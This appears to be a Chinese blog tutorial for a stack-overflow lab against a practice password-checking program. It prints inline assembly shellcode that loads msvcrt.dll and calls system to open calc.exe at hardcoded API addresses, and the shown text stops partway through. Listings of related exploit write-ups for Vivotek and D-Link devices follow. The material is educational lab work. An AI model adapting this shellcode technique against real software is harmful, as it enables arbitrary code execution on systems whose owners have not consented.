一个栈溢出漏洞实验的流程

实验原本是模拟一个密码验证程序,其代码如下:

其中verify_password代码如下:

用红框圈起来的地方发现有一个缓冲区漏洞,我们就利用这里进行栈溢出操作。我们这里只是尝试着弹出一个calc.exe。

先构造汇编代码,这里是先利用LoadLibrary加载msvcrt.dll,在利用system函数弹出calc.exe,最后利用ExitProcess退出,以防止栈破坏而报错:

void main()
{
    __asm
    {
        mov esp, ebp;
        push ebp;
        mov ebp, esp;
        xor edi, edi;
        push edi;
        sub esp, 08h;
        mov byte ptr[ebp - 0ch], 6Dh;  //m
        mov byte ptr[ebp - 0bh], 73h;  //s
        mov byte ptr[ebp - 0ah], 76h;  //v
        mov byte ptr[ebp - 09h], 63h;  //c
        mov byte ptr[ebp - 08h], 72h;  //r
        mov byte ptr[ebp - 07h], 74h;  //t
        mov byte ptr[ebp - 06h], 2Eh;  //.
        mov byte ptr[ebp - 05h], 64h;  //d
        mov byte ptr[ebp - 04h], 6Ch;  //l
        mov byte ptr[ebp - 03h], 6Ch;  //l
        lea eax, [ebp - 0Ch];
        push eax;
        mov eax, 0x763b8f80;
        call eax;//LoadLibrary

        xor edi, edi;
        push edi;
        sub esp, 08h;
        mov byte ptr[ebp - 18h], 63h;  //c
        mov byte ptr[ebp - 17h], 61h;  //a
        mov byte ptr[ebp - 16h], 6ch;  //l
        mov byte ptr[ebp - 15h], 63h;  //c
        mov byte ptr[ebp - 14h], 2Eh;  //.
        mov byte ptr[ebp - 13h], 65h;  //e
        mov byte ptr[ebp - 12h], 78h;  //x
        mov byte ptr[ebp - 11h], 65h;  //e

        //system    0x762fb730
        lea eax, [ebp - 18h];
        push eax;
        mov eax, 0x762fb730;
        call eax;//system
        mov eax, 0x763c9850;
        call eax;//ExitProcess
    }
}

_asm中间的才是我们需要的,之所以放入main函数只是为了运行测试我们所写的汇编代码是否有问题,运行:

可以正常弹出calc.exe,说明汇编代码没有问题。那么我们现在利用VS的反汇编功能,查看这些汇编代码的机器码,记得要在反汇编窗口右键选中“显示代码字节”,才能看到机器码:

选中后显示如下:

这里有一个问题,我们call eax的时候实际上是在调用API,我们又是如何知道这些API的地址的呢?

时间: 2024-10-23 03:24:05

一个栈溢出漏洞实验的流程的相关文章

Vivotek 摄像头远程栈溢出漏洞分析及利用

Vivotek 摄像头远程栈溢出漏洞分析及利用 近日,Vivotek 旗下多款摄像头被曝出远程未授权栈溢出漏洞,攻击者发送特定数据可导致摄像头进程崩溃. 漏洞作者@bashis 放出了可造成摄像头 Crash 的 PoC :https://www.seebug.org/vuldb/ssvid-96866 该漏洞在 Vivotek 的摄像头中广泛存在,按照官方的安全公告,会影响以下版本 CC8160 CC8370-HV CC8371-HV CD8371-HNTV CD8371-HNVF2 FD81

栈溢出漏洞的利用和缓解

一直有人说这个时代做渗透太难了, 各个平台都开始重视安全性, 不像十几年前, 随便有个栈溢出就能轻松利用. 现在的环境对于新手而言确实不算友好, 上来就需要 面临着各种边界保护, 堆栈保护, 地址布局随机化. 但现实如此, 与其抱怨, 不如直面现实, 拥抱变化, 对吧? 本文所演示的环境为64位Linux+32位ELF程序. 文中所用到的代码和exp皆可在github仓库中找到. 前言 知识准备 首先, 当然是要先了解什么是栈溢出. 要了解栈溢出, 就必须要先知道栈的布局. 以32位应用程序为例

路由器漏洞挖掘之 DIR-815 栈溢出漏洞分析

这次笔者来复现一个比较经典的栈溢出漏洞:D-link dir-815 栈溢出.其实这个路由器的栈溢出漏洞的利用方式和之前 DVRF 靶机平台的栈溢出例子大同小异,只是需要注意下一些小的地方. 前言 这个栈溢出的原因是由于 cookie 的值过长导致的栈溢出.服务端取得客户端请求的 HTTP 头中 Cookie 字段中 uid 的值,格式化到栈上导致溢出. 漏洞分析 大体流程 首先还是先将 cgibin 加载到 IDA 中,定位到 sobj_get_string 函数. 在 sobj_get_st

实验2:SET-UID程序漏洞实验

SET-UID程序漏洞实验 一.实验描述 Set-UID 是Unix系统中的一个重要的安全机制.当一个Set-UID程序运行的时候,它被假设为具有拥有者的权限.例如,如果程序的拥有者是root,那么任何人运行这个程序时都会获得程序拥有者的权限.Set-UID允许我们做许多很有趣的事情,但是不幸的是,它也是很多坏事情的罪魁祸首. 因此本次实验的目标有两点: 1.欣赏好的方面,理解为什么Set-UID是需要的,以及它是如何被执行的. 2.注意坏的方面,理解它潜在的安全性问题. 二.实验内容 这是一个

linux试验——SET-UID程序漏洞实验

SET-UID程序漏洞实验 20125121 一.实验描述 Set-UID 是Unix系统中的一个重要的安全机制.当一个Set-UID程序运行的时候,它被假设为具有拥有者的权限.例如,如果程序的拥有者是root,那么任何人运行这个程序时都会获得程序拥有者的权限.Set-UID允许我们做许多很有趣的事情,但是不幸的是,它也是很多坏事情的罪魁祸首. 二.实验内容 2.1 猜测为什么“passwd”,“chsh”,“su”,和“sudo”命令需要Set-UID机制,如果它们没有这些机制的话,会发生什么

实验一——缓冲区溢出漏洞实验

Linux实验一 —— 缓冲区溢出漏洞实验 20122137 一.实验描述 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况.这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段.这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写. 二.实验准备 系统用户名shiyanlou,密码shiyanlou 实验楼提供的是64位Ubuntu linux,而本次实验为了方便观察汇编语句,我们需要在32位环境下作操作,因此实验之前需要做一些准备. 1.

实验一:缓冲区溢出漏洞实验20115116黄婧

缓冲区溢出攻击:通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的. 一.实验要求 1.为了监控实验进程,我们采用私有课程方式,进入实验楼课程,单击加入私有课程,输入邀请码2YTE6J9X,个人信息中输入学号+姓名; 2.实验报告在博客园 发Blog公开,重点是实验过程中的运行结果(要有截图),遇到的问题.解决办法(不要是空洞的方法如“查网络”.“问同学”.“看书”等)以及分析(从中可以得到什么启示,有什么收获,教训

linux实验二:SET-UID程序漏洞实验

SET-UID程序漏洞实验 20125113 赵恺 一.实验描述 Set-UID 是Unix系统中的一个重要的安全机制.当一个Set-UID程序运行的时候,它被假设为具有拥有者的权限.例如,如果程序的拥有者是root,那么任何人运行这个程序时都会获得程序拥有者的权限.Set-UID允许我们做许多很有趣的事情,但是不幸的是,它也是很多坏事情的罪魁祸首. 因此本次实验的目标有两点: 1.欣赏好的方面,理解为什么Set-UID是需要的,以及它是如何被执行的. 2.注意坏的方面,理解它潜在的安全性问题.

缓冲区溢出漏洞实验20125111

练习1 一.实验描述 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况.这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段.这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写. 二.实验准备 系统用户名shiyanlou,密码shiyanlou 实验楼提供的是64位Ubuntu linux,而本次实验为了方便观察汇编语句,我们需要在32位环境下作操作,因此实验之前需要做一些准备. 1.输入命令安装一些用于编译32位C程序的东西: 2.输入